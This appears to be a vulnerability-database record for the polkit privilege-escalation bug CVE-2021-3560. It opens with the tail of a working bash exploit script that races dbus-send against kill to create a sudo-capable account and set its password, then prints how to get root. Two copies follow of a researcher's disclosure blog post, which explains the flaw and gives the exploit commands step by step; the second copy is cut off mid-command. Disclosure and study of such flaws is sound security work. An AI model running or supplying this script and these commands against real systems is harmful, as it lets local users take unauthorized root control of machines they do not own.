desktop terminal\r\nif [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then\r\n echo \"[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts\"\r\n exit\r\nfi\r\n\r\n# Test the dbus-send timing to load into exploit\r\necho \"[*] Determining dbus-send timing\"\r\nrealTime=$( TIMEFORMAT=\"%R\"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d \" \" -f6 )\r\nhalfTime=$(echo \"scale=3;$realTime/2\" | bc)\r\n\r\n# Check for user first in case previous run of script failed on password set\r\nif id \"$userName\" &>/dev/null; then\r\n userid=$(id -u $userName)\r\n echo \"[*] New user $userName already exists with uid of $userid\"\r\nelse\r\n userid=\"\"\r\n\techo \"[*] Attempting to create account\"\r\n while [[ $userid == \"\" ]]\r\n do\r\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null\r\n if id \"$userName\" &>/dev/null; then\r\n\t userid=$(id -u $userName)\r\n echo \"[*] New user $userName created with uid of $userid\"\r\n fi\r\n done\r\nfi\r\n\r\n# Add the password to /etc/shadow\r\n# Sleep added to ensure there is enough of a delay between timestamp checks\r\necho \"[*] Adding password to /etc/shadow and enabling user\"\r\nsleep 1\r\ncurrentTimestamp=$(stat -c %Z /etc/shadow)\r\nfileChanged=\"n\"\r\nwhile [ $fileChanged == \"n\" ]\r\ndo \r\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null\r\n\tif [ $(stat -c %Z /etc/shadow) -ne $currentTimestamp ];then\r\n\t fileChanged=\"y\"\r\n\t echo \"[*] Exploit complete!\"\r\n\tfi\r\ndone\r\n\r\necho \"\"\r\necho \"[*] Run 'su - $userName', followed by 'sudo su' to gain root access\"", "sourceHref": "https://www.exploit-db.com/raw/50011", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T09:55:15", "description": "# Privilege escalation with polkit: How to get root on Linux with a seven-\n\nyear-old bug\n\n \n\nKevin Backhouse\n\n](https://github.blog/author/kevinbackhouse/)\n\n[polkit](https://gitlab.freedesktop.org/polkit/polkit/) is a system service\ninstalled by default on many Linux distributions. It's used by\n[systemd](https://systemd.io/), so any Linux distribution that uses systemd\nalso uses polkit. As a member of [GitHub Security\nLab](https://securitylab.github.com/), my job is to help improve the security\nof open source software by finding and reporting vulnerabilities. A few weeks\nago, I found a privilege escalation vulnerability in polkit. I coordinated the\ndisclosure of the vulnerability with the polkit maintainers and with [Red\nHat's security team.](https://access.redhat.com/security/overview/) It was\npublicly disclosed, the fix was released on June 3, 2021, and it was assigned\n[CVE-2021-3560](https://access.redhat.com/security/cve/CVE-2021-3560).\n\nThe vulnerability enables an unprivileged local user to get a root shell on\nthe system. It's easy to exploit with a few standard command line tools, as\nyou can see in this [short video](https://youtu.be/QZhz64yEd0g). In this blog\npost, I'll explain how the exploit works and show you where the bug was in the\nsource code.\n\n**Table of contents**\n\n * History of CVE-2021-3560 and vulnerable distributions\n * About polkit\n * Exploitation steps\n * polkit architecture\n * The vulnerability\n * org.freedesktop.policykit.imply annotations\n * Conclusion\n\n## History of CVE-2021-3560 and vulnerable distributions\n\nThe bug I found was quite old. It was introduced seven years ago in commit\n[bfa5036](https://gitlab.freedesktop.org/polkit/polkit/-/commit/bfa5036bfb93582c5a87c44b847957479d911e38)\nand first shipped with polkit version 0.113. However, many of the most popular\nLinux distributions didn't ship the vulnerable version until more recently.\n\nThe bug has a slightly different history on [Debian](https://www.debian.org/)\nand its derivatives (such as [Ubuntu](https://ubuntu.com/)), because Debian\nuses a [fork of polkit](https://salsa.debian.org/utopia-team/polkit) with a\ndifferent version numbering scheme. In the Debian fork, the bug was introduced\nin commit [f81d021](https://salsa.debian.org/utopia-\nteam/polkit/-/commit/f81d021e3cb97a0816285eb95c2a77f554d30966) and first\nshipped with version 0.105-26. The most recent stable release of Debian,\n[Debian 10 (\"buster\")](https://www.debian.org/releases/buster/), uses version\n0.105-25, which means that it isn't vulnerable. However, some Debian\nderivatives, such as Ubuntu, are based on [Debian\nunstable](https://www.debian.org/releases/sid/), which is vulnerable.\n\nHere's a table with a selection of popular distributions and whether they're\nvulnerable (note that this isn't a comprehensive list):\n\n| Distribution | Vulnerable? |\n| --------------------------- | ------------------------------------------------------------ |\n| RHEL 7 | No |\n| RHEL 8 | [Yes](https://access.redhat.com/security/cve/CVE-2021-3560) |\n| Fedora 20 (or earlier) | No |\n| Fedora 21 (or later) | [Yes](https://bugzilla.redhat.com/show_bug.cgi?id=1967424) |\n| Debian 10 (\u201cbuster\u201d) | No |\n| Debian testing (\u201cbullseye\u201d) | [Yes](https://security-tracker.debian.org/tracker/CVE-2021-3560) |\n| Ubuntu 18.04 | No |\n| Ubuntu 20.04 | [Yes](https://ubuntu.com/security/CVE-2021-3560) |\n\n## About polkit\n\n[polkit](https://gitlab.freedesktop.org/polkit/polkit/) is the system service\nthat's running under the hood when you see a dialog box like the one below:\n\n\n\nIt essentially plays the role of a judge. If you want to do something that\nrequires higher privileges--for example, creating a new user account--then\nit's polkit's job to decide whether or not you're allowed to do it. For some\nrequests, polkit will make an instant decision to allow or deny, and for\nothers it will pop up a dialog box so that an administrator can grant\nauthorization by entering their password.\n\nThe dialog box might give the impression that polkit is a graphical system,\nbut it's actually a background process. The dialog box is known as an\n_authentication agent_ and it's really just a mechanism for sending your\npassword to polkit. To illustrate that polkit isn't just for graphical\nsessions, try running this command in a terminal:\n\n\n\u200b \n\n pkexec reboot\n\n[`pkexec`](https://manpages.ubuntu.com/manpages/focal/en/man1/pkexec.1.html)\nis a similar command to\n[`sudo`](https://manpages.ubuntu.com/manpages/focal/en/man8/sudo.8.html),\nwhich enables you to run a command as root. If you run `pkexec` in a graphical\nsession, it will pop up a dialog box, but if you run it in a text-mode session\nsuch as SSH then it starts its own text-mode authentication agent:\n\n\n\u200b \n\n $ pkexec reboot\n ==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===\n Authentication is needed to run `/usr/sbin/reboot' as the super user\n Authenticating as: Kevin Backhouse,,, (kev)\n Password:\n\nAnother command that you can use to trigger `polkit` from the command line is\n[`dbus-send`](https://manpages.ubuntu.com/manpages/focal/en/man1/dbus-\nsend.1.html). It's a general purpose tool for sending D-Bus messages that's\nmainly used for testing, but it's usually installed by default on systems that\nuse D-Bus. It can be used to simulate the D-Bus messages that the graphical\ninterface might send. For example, this is the command to create a new user:\n\n\n\u200b \n\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1\n\nIf you run that command in a graphical session, an authentication dialog box\nwill pop up, but if you run it in a text-mode session such as\n[SSH](https://www.openssh.com/), then it fails immediately. That's because,\nunlike `pkexec`, `dbus-send` does not start its own authentication agent.\n\n## Exploitation steps\n\nThe vulnerability is surprisingly easy to exploit. All it takes is a few\ncommands in the terminal using only standard tools like[`bash`](https://manpages.ubuntu.com/manpages/focal/en/man1/bash.1.html),[`kill`](https://manpages.ubuntu.com/manpages/focal/en/man1/kill.1.html), and[`dbus-send`](https://manpages.ubuntu.com/manpages/focal/en/man1/dbus-\nsend.1.html).\n\nThe proof of concept (PoC) exploit I describe in this section depends on two\npackages being installed: `accountsservice` and `gnome-control-center`. On a\ngraphical system such as Ubuntu Desktop, both of those packages are usually\ninstalled by default. But if you're using something like a non-graphical RHEL\nserver, then you might need to install them, like this:\n\n\n\u200b \n\n sudo yum install accountsservice gnome-control-center\n\nOf course, the vulnerability doesn't have anything specifically to do with\neither `accountsservice` or `gnome-control-center`. They're just polkit\nclients that happen to be convenient vectors for exploitation. The reason why\nthe PoC depends on `gnome-control-center` and not just `accountsservice` is\nsubtle--I'll explain that later.\n\nTo avoid repeatedly triggering the authentication dialog box (which can be\nannoying), I recommend running the commands from an SSH session:\n\n\n\u200b \n\n ssh localhost\n\nThe vulnerability is triggered by starting a `dbus-send` command but killing\nit while polkit is still in the middle of processing the request. I like to\nthink that it's theoretically possible to trigger by smashing Ctrl+C at just\nthe right moment, but I've never succeeded, so I do it with a small amount of\nbash scripting instead. First, you need to measure how long it takes to run\nthe `dbus-send` command normally:\n\n\n\u200b \n\n time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1\n\nThe output will look something like this:\n\n\n\u200b \n\n Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required\n \n real 0m0.016s\n user 0m0.005s\n sys 0m0.000s\n\nThat took 16 milliseconds for me, so that means that I need to kill the `dbus-\nsend` command after approximately 8 milliseconds:\n\n\n\u200b \n\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1 & sleep 0.008s ; kill $!\n\nYou might need to run that a few times, and you might need to experiment with\nthe number of milliseconds in the delay. When the exploit succeeds, you'll see\nthat a new user named `boris` has been created:\n\n\n\u200b \n\n $ id boris\n uid=1002(boris) gid=1002(boris) groups=1002(boris),27(sudo)\n\nNotice that `boris` is a member of the `sudo` group, so you're already well on\nyour way to full privilege escalation. Next, you need to set a password for\nthe new account. The D-Bus interface expects a hashed password, which you can\ncreate using `openssl`:\n\n\n\u200b \n\n $ openssl passwd -5 iaminvincible!\n $5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB\n\nNow you just have to do the same trick again, except this time call the\n`SetPassword` D-Bus method:\n\n\n\u200b \n\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB' string:GoldenEye & sleep 0.008s ; kill $!\n\nAgain, you might need to experiment with the length of the delay and run it\nseveral times until it succeeds. Also, note that you need to paste in the\ncorrect user identifier (UID), which is \"1002\" in this example, plus the\npassword hash from the `openssl` command.\n\nNow you can login as boris and become root:\n\n\n\u200b \n\n su - boris # password: iaminvincible!\n sudo su # password: iaminvincible!\n\n\n\n## polkit architecture\n\nTo help explain the vulnerability, here's a diagram of the five main processes\ninvolved during the `dbus-send` command:\n\n\n\nThe two processes above the dashed line--`dbus-send` and the authentication\nagent--are unprivileged user processes. Those below the line are privileged\nsystem processes. In the center is `dbus-daemon`, which handles all of the\ncommunication: the other four processes communicate with each other by sending\nD-Bus messages.\n\n`dbus-daemon` plays a very important role in the security of polkit, because\nit enables the four processes to communicate securely and check each other's\ncredentials. For example, when the authentication agent sends an\nauthentication cookie to polkit, it does so by sending it to the\n`org.freedesktop.PolicyKit1` D-Bus address. Since that address is only allowed\nto be registered by a root process, there is no risk of an unprivileged\nprocess intercepting messages. `dbus-daemon` also assigns every connection a\n\"unique bus name:\" typically something like \":1.96\". It's a bit like a process\nidentifier (PID), except without being vulnerable to [PID recycling\nattacks](https://securitylab.github.com/research/ubuntu-apport-\nCVE-2019-15790/). Unique bus names are currently chosen from a 64-bit range,\nso there's no risk of a vulnerability caused by a name being reused.\n\nThis is the sequence of events:\n\n 1. `dbus-send` asks `accounts-daemon` to create a new user.\n 2. `accounts-daemon` receives the D-Bus message from `dbus-send`. The message includes the unique bus name of the sender. Let's assume it's \":1.96\". This name is attached to the message by `dbus-daemon` and cannot be forged.\n 3. `accounts-daemon` asks polkit if connection :1.96 is authorized to create a new user.\n 4. polkit asks `dbus-daemon` for the UID of connection :1.96.\n 5. If the UID of connection :1.96 is \"0,\" then polkit immediately authorizes the request. Otherwise, it sends the authentication agent a list of administrator users who are allowed to authorize the request.\n 6. The authentication agent opens a dialog box to get the password from the user.\n 7. The authentication agent sends the password to polkit.\n 8. polkit sends a \"yes\" reply back to `accounts-daemon`.\n 9. `accounts-daemon` creates the new user account.\n\n## The vulnerability\n\nWhy does killing the `dbus-send` command cause an authentication bypass? The\nvulnerability is in step four of the sequence of events listed above. What\nhappens if polkit asks `dbus-daemon` for the UID of connection :1.96, but\nconnection :1.96 no longer exists? `dbus-daemon` handles that situation\ncorrectly and returns an error. But it turns out that polkit does not handle\nthat error correctly. In fact, polkit mishandles the error in a particularly\nunfortunate way: rather than rejecting the request, it treats the request as\nthough it came from a process with UID 0. In other words, it immediately\nauthorizes the request because it thinks the request has come from a root\nprocess.\n\nWhy is the timing of the vulnerability non-deterministic? It turns out that\npolkit asks `dbus-daemon` for the UID of the requesting process multiple\ntimes, on different codepaths. Most of those codepaths handle the error\ncorrectly, but one of them doesn't. If you kill the `dbus-send` command early,\nit's handled by one of the correct codepaths and the request is rejected. To\ntrigger the vulnerable codepath, you have to disconnect at just the right\nmoment. And because there are multiple processes involved, the timing of that\n\"right moment\" varies from one run to the next. That's why it usually takes a\nfew tries for the exploit to succeed. I'd guess it's also the reason why the\nbug wasn't previously discovered. If you could trigger the vulnerability by\nkilling the `dbus-send` command immediately, then I expect it would have been\ndiscovered a long time ago, because that's a much more obvious thing to test\nfor.\n\nThe function which asks `dbus-daemon` for the UID of the requesting connection\nis named\n[`polkit_system_bus_name_get_creds_sync`](https://gitlab.freedesktop.org/polkit/polkit/-/blob/bfa5036bfb93582c5a87c44b847957479d911e38/src/polkit/polkitsystembusname.c#L388):\n\n\n\u200b \n\n static gboolean\n polkit_system_bus_name_get_creds_sync (\n PolkitSystemBusName *system_bus_name,\n guint32 *out_uid,\n guint32 *out_pid,\n GCancellable *cancellable,\n GError **error)\n\nThe behavior of\n[`polkit_system_bus_name_get_creds_sync`](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L388)\nis strange, because when an error occurs, the function sets the error\nparameter but still returns `TRUE`. It wasn't clear to me, when I wrote my\n[bug report](https://gitlab.freedesktop.org/polkit/polkit/-/issues/140),\nwhether that was a bug or a deliberate design choice. (It turns out that it\nwas a bug, because the polkit developers have [fixed the\nvulnerability](https://gitlab.freedesktop.org/polkit/polkit/-/commit/a04d13affe0fa53ff618e07aa8f57f4c0e3b9b81)\nby returning `FALSE` on error.) My uncertainty arose from the fact that\n_almost all_ the callers of `polkit_system_bus_name_get_creds_sync` don't just\ncheck the Boolean result, but also check that the error value is still `NULL`\nbefore proceeding. The cause of the vulnerability was that the error value\nwasn't checked in the following stack trace:\n\n\n\u200b \n\n 0 in polkit_system_bus_name_get_creds_sync of [polkitsystembusname.c:388](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L388)\n 1 in polkit_system_bus_name_get_user_sync of [polkitsystembusname.c:511](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkit/polkitsystembusname.c#L511)\n 2 in polkit_backend_session_monitor_get_user_for_subject of [polkitbackendsessionmonitor-systemd.c:303](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendsessionmonitor-systemd.c#L303)\n 3 in check_authorization_sync of [polkitbackendinteractiveauthority.c:1121](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121)\n 4 in check_authorization_sync of [polkitbackendinteractiveauthority.c:1227](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1227)\n 5 in polkit_backend_interactive_authority_check_authorization of [polkitbackendinteractiveauthority.c:981](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L981)\n 6 in polkit_backend_authority_check_authorization of [polkitbackendauthority.c:227](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L227)\n 7 in server_handle_check_authorization of [polkitbackendauthority.c:790](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L790)\n 7 in server_handle_method_call of [polkitbackendauthority.c:1272](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendauthority.c#L1272)\n\nThe bug is in this snippet of code in\n[`check_authorization_sync`](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121):\n\n\n\u200b \n\n /* every subject has a user; this is supplied by the client, so we rely\n * on the caller to validate its acceptability. */\n user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,\n subject, NULL,\n error);\n if (user_of_subject == NULL)\n goto out;\n \n /* special case: uid 0, root, is _always_ authorized for anything */\n if (POLKIT_IS_UNIX_USER (user_of_subject) && polkit_unix_user_get_uid (POLKIT_UNIX_USER (user_of_subject)) == 0)\n {\n result = polkit_authorization_result_new (TRUE, FALSE, NULL);\n goto out;\n }\n\nNotice that the value of `error` is not checked.\n\n## `org.freedesktop.policykit.imply` annotations\n\nI mentioned earlier that my PoC depends on `gnome-control-center` being\ninstalled, in addition to `accountsservice`. Why is that? The PoC doesn't use\n`gnome-control-center` in any visible way, and I didn't even realize that I\nwas depending on it when I wrote the PoC! In fact, I only found out because\nthe Red Hat security team couldn't reproduce my PoC on RHEL. When I tried it\nfor myself on a RHEL 8.4 VM, I also found that the PoC didn't work. That was\npuzzling, because it was working beautifully on Fedora 32 and CentOS Stream.\nThe crucial difference, it turned out, was that my RHEL VM was a non-graphical\nserver with no GNOME installed. So why does that matter? The answer is\n`policykit.imply` annotations.\n\nSome polkit actions are essentially equivalent to each other, so if one has\nalready been authorized then it makes sense to silently authorize the other.\nThe GNOME settings dialog is a good example:\n\n\n\nAfter you've clicked the \"Unlock\" button and entered your password, you can do\nthings like adding a new user account without having to authenticate a second\ntime. That's handled by a `policykit.imply` annotation, which is defined in\nthis [config file](https://gitlab.gnome.org/GNOME/gnome-control-\ncenter/-/blob/54eb734eaaa95807dd805fbe4e4ad0dceb787736/panels/user-\naccounts/org.gnome.controlcenter.user-accounts.policy.in):\n\n\n\u200b \n\n /usr/share/polkit-1/actions/org.gnome.controlcenter.user-accounts.policy\n\nThe config file contains the following implication:\n\n\n\nIn other words, if you're authorized to perform `controlcenter` admin actions,\nthen you're also authorized to perform `accountsservice` admin actions.\n\nWhen I attached [GDB](https://www.gnu.org/software/gdb/) to polkit on my RHEL\nVM, I found that I wasn't seeing the vulnerable stack trace that I listed\nearlier. Notice that step four of the stack trace is a recursive call from\n`check_authorization_sync` to itself. That happens on [line\n1227](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1227),\nwhich is where polkit checks the `policykit.imply` annotations:\n\n\n\u200b \n\n PolkitAuthorizationResult *implied_result = NULL;\n PolkitImplicitAuthorization implied_implicit_authorization;\n GError *implied_error = NULL;\n const gchar *imply_action_id;\n \n imply_action_id = polkit_action_description_get_action_id (imply_ad);\n \n /* g_debug (\"%s is implied by %s, checking\", action_id, imply_action_id); */\n implied_result = check_authorization_sync (authority, caller, subject,\n imply_action_id,\n details, flags,\n &implied_implicit_authorization, TRUE,\n &implied_error);\n if (implied_result != NULL)\n {\n if (polkit_authorization_result_get_is_authorized (implied_result))\n {\n g_debug (\" is authorized (implied by %s)\", imply_action_id);\n result = implied_result;\n /* cleanup */\n g_strfreev (tokens);\n goto out;\n }\n g_object_unref (implied_result);\n }\n if (implied_error != NULL)\n g_error_free (implied_error);\n\nThe authentication bypass depends on the error value getting ignored. It was\nignored on [line\n1121](https://gitlab.freedesktop.org/polkit/polkit/-/blob/ff4c2144f0fb1325275887d9e254117fcd8a1b52/src/polkitbackend/polkitbackendinteractiveauthority.c#L1121),\nbut it's still stored in the `error` parameter, so it also needs to be ignored\nby the caller. The block of code above has a temporary variable named\n`implied_error`, which is ignored when `implied_result` isn't null. That's the\ncrucial step that makes the bypass possible.\n\nTo sum up, the authentication bypass only works on polkit actions that are\nimplied by another polkit action. That's why my PoC only works if\ngnome-`control-center` is installed: it adds the `policykit.imply` annotation\nthat enables me to target `accountsservice`. That does not mean that RHEL is\nsafe from this vulnerability, though. Another attack vector for the\nvulnerability is [`packagekit`](https://packagekit.freedesktop.org/), which is\ninstalled by default on RHEL and has a suitable `policykit.imply` annotation\nfor the `package-install` action. `packagekit` is used to install packages, so\nit can be exploited to install `gnome-control-center`, after which the rest of\nthe exploit works as before.\n\n## Conclusion\n\nCVE-2021-3560 enables an unprivileged local attacker to gain root privileges.\nIt's very simple and quick to exploit, so it's important that you update your\nLinux installations as soon as possible. Any system that has polkit version\n0.113 (or later) installed is vulnerable. That includes popular distributions\nsuch as RHEL 8 and Ubuntu 20.04.\n\nAnd if you like nerding out about security vulnerabilities (and how to fix\nthem) check out some of the other work that the [Security\nLab](https://securitylab.github.com/) team is doing or follow us on\n[Twitter](https://twitter.com/GHSecurityLab).\n\n**Tags:** [GitHub Security Lab](https://github.blog/tag/github-security-lab/)", "cvss3": {}, "published": "2021-06-15T00:00:00", "type": "seebug", "title": "Linux Polkit\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\uff08CVE-2021-3560\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-15790", "CVE-2021-3560"], "modified": "2021-06-15T00:00:00", "id": "SSV:99275", "href": "https://www.seebug.org/vuldb/ssvid-99275", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2021-07-28T15:17:29", "description": "[polkit](<https://gitlab.freedesktop.org/polkit/polkit/>) is a system service installed by default on many Linux distributions. It\u2019s used by [systemd](<https://systemd.io/>), so any Linux distribution that uses systemd also uses polkit. As a member of [GitHub Security Lab](<https://securitylab.github.com/>), my job is to help improve the security of open source software by finding and reporting vulnerabilities. A few weeks ago, I found a privilege escalation vulnerability in polkit. I coordinated the disclosure of the vulnerability with the polkit maintainers and with [Red Hat\u2019s security team.](<https://access.redhat.com/security/overview/>) It was publicly disclosed, the fix was released on June 3, 2021, and it was assigned [CVE-2021-3560](<https://access.redhat.com/security/cve/CVE-2021-3560>).\n\nThe vulnerability enables an unprivileged local user to get a root shell on the system. It\u2019s easy to exploit with a few standard command line tools, as you can see in this [short video](<https://youtu.be/QZhz64yEd0g>). In this blog post, I\u2019ll explain how the exploit works and show you where the bug was in the source code.\n\n**Table of contents**\n\n * History of CVE-2021-3560 and vulnerable distributions\n * About polkit\n * Exploitation steps\n * polkit architecture\n * The vulnerability\n * org.freedesktop.policykit.imply annotations\n * Conclusion\n\n## History of CVE-2021-3560 and vulnerable distributions\n\nThe bug I found was quite old. It was introduced seven years ago in commit [bfa5036](<https://gitlab.freedesktop.org/polkit/polkit/-/commit/bfa5036bfb93582c5a87c44b847957479d911e38>) and first shipped with polkit version 0.113. However, many of the most popular Linux distributions didn\u2019t ship the vulnerable version until more recently.\n\nThe bug has a slightly different history on [Debian](<https://www.debian.org/>) and its derivatives (such as [Ubuntu](<https://ubuntu.com/>)), because Debian uses a [fork of polkit](<https://salsa.debian.org/utopia-team/polkit>) with a different version numbering scheme. In the Debian fork, the bug was introduced in commit [f81d021](<https://salsa.debian.org/utopia-team/polkit/-/commit/f81d021e3cb97a0816285eb95c2a77f554d30966>) and first shipped with version 0.105-26. The most recent stable release of Debian, [Debian 10 (\u201cbuster\u201d)](<https://www.debian.org/releases/buster/>), uses version 0.105-25, which means that it isn\u2019t vulnerable. However, some Debian derivatives, such as Ubuntu, are based on [Debian unstable](<https://www.debian.org/releases/sid/>), which is vulnerable.\n\nHere\u2019s a table with a selection of popular distributions and whether they\u2019re vulnerable (note that this isn\u2019t a comprehensive list):\n\nDistribution | Vulnerable? \n---|--- \nRHEL 7 | No \nRHEL 8 | [Yes](<https://access.redhat.com/security/cve/CVE-2021-3560>) \nFedora 20 (or earlier) | No \nFedora 21 (or later) | [Yes](<https://bugzilla.redhat.com/show_bug.cgi?id=1967424>) \nDebian 10 (\u201cbuster\u201d) | No \nDebian testing (\u201cbullseye\u201d) | [Yes](<https://security-tracker.debian.org/tracker/CVE-2021-3560>) \nUbuntu 18.04 | No \nUbuntu 20.04 | [Yes](<https://ubuntu.com/security/CVE-2021-3560>) \n \n## About polkit\n\n[polkit](<https://gitlab.freedesktop.org/polkit/polkit/>) is the system service that\u2019s running under the hood when you see a dialog box like the one below:\n\n\n\nIt essentially plays the role of a judge. If you want to do something that requires higher privileges--for example, creating a new user account--then it\u2019s polkit\u2019s job to decide whether or not you\u2019re allowed to do it. For some requests, polkit will make an instant decision to allow or deny, and for others it will pop up a dialog box so that an administrator can grant authorization by entering their password.\n\nThe dialog box might give the impression that polkit is a graphical system, but it\u2019s actually a background process. The dialog box is known as an _authentication agent_ and it\u2019s really just a mechanism for sending your password to polkit. To illustrate that polkit isn\u2019t just for graphical sessions, try running this command in a terminal:\n \n \n pkexec reboot\n\n[`pkexec`](<https://manpages.ubuntu.com/manpages/focal/en/man1/pkexec.1.html>) is a similar command to [`sudo`](<https://manpages.ubuntu.com/manpages/focal/en/man8/sudo.8.html>), which enables you to run a command as root. If you run `pkexec` in a graphical session, it will pop up a dialog box, but if you run it in a text-mode session such as SSH then it starts its own text-mode authentication agent:\n \n \n $ pkexec reboot\n ==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===\n Authentication is needed to run `/usr/sbin/reboot' as the super user\n Authenticating as: Kevin Backhouse,,, (kev)\n Password:\n\nAnother command that you can use to trigger `polkit` from the command line is [`dbus-send`](<https://manpages.ubuntu.com/manpages/focal/en/man1/dbus-send.1.html>). It\u2019s a general purpose tool for sending D-Bus messages that\u2019s mainly used for testing, but it\u2019s usually installed by default on systems that use D-Bus. It can be used to simulate the D-Bus messages that the graphical interface might send. For example, this is the command to create a new user:\n \n \n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1\n\nIf you run that command in a graphical session, an authentication dialog box will pop up, but if you run it in a text-mode session such as [SSH](<https://www.openssh.com/>), then it fails immediately. That\u2019s because, unlike `pkexec`, `dbus-send` does not start its own authentication agent.\n\n## Exploitation steps\n\nThe vulnerability is surprisingly easy to exploit. All it takes is a few commands in the terminal using only standard tools like [`bash`](<https://manpages.ubuntu.com/manpages/focal/en/man1/bash.1.html>), [`kill`](<https://manpages.ubuntu.com/manpages/focal/en/man1/kill.1.html>), and [`dbus-send`](<https://manpages.ubuntu.com/manpages/focal/en/man1/dbus-send.1.html>).\n\nThe proof of concept (PoC) exploit I describe in this section depends on two packages being installed: `accountsservice` and `gnome-control-center`. On a graphical system such as Ubuntu Desktop, both of those packages are usually installed by default. But if you\u2019re using something like a non-graphical RHEL server, then you might need to install them, like this:\n \n \n sudo yum install accountsservice gnome-control-center\n\nOf course, the vulnerability doesn\u2019t have anything specifically to do with either `accountsservice` or `gnome-control-center`. They\u2019re just polkit clients that happen to be convenient vectors for exploitation. The reason why the PoC depends on `gnome-control-center` and not just `accountsservice` is subtle--I\u2019ll explain that later.\n\nTo avoid repeatedly triggering the authentication dialog box (which can be annoying), I recommend running the commands from an SSH session:\n \n \n ssh localhost\n\nThe vulnerability is triggered by starting a `dbus-send` command but killing it while polkit is still in the middle of processing the request. I like to think that it\u2019s theoretically possible to trigger by smashing Ctrl+C at just the right moment, but I\u2019ve never succeeded, so I do it with a small amount of bash scripting instead. First, you need to measure how long it takes to run the `dbus-send` command normally:\n \n \n time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1\n\nThe output will look something like this:\n \n \n Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required\n \n real 0m0.016s\n user 0m0.005s\n sys 0m0.000s\n\nThat took 16 milliseconds for me, so that means that I need to kill the `dbus-send` command after approximately 8 milliseconds:\n \n \n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:\"Boris Ivanovich Grishenko\" int32:1 & sleep 0.008s ; kill $!\n\nYou might need to run that a few times, and you might need to experiment with the number of milliseconds in the delay. When the exploit succeeds, you\u2019ll see that a new user named `boris` has been created:\n \n \n $ id boris\n uid=1002(boris) gid=1002(boris) groups=1002(boris),27(sudo)\n\nNotice that `boris` is a member of the `sudo` group, so you\u2019re already well on your way to full privilege escalation. Next, you need to set a password for the new account. The D-Bus interface expects a hashed password, which you can create using `openssl`:\n \n \n $ openssl passwd -5 iaminvincible!\n 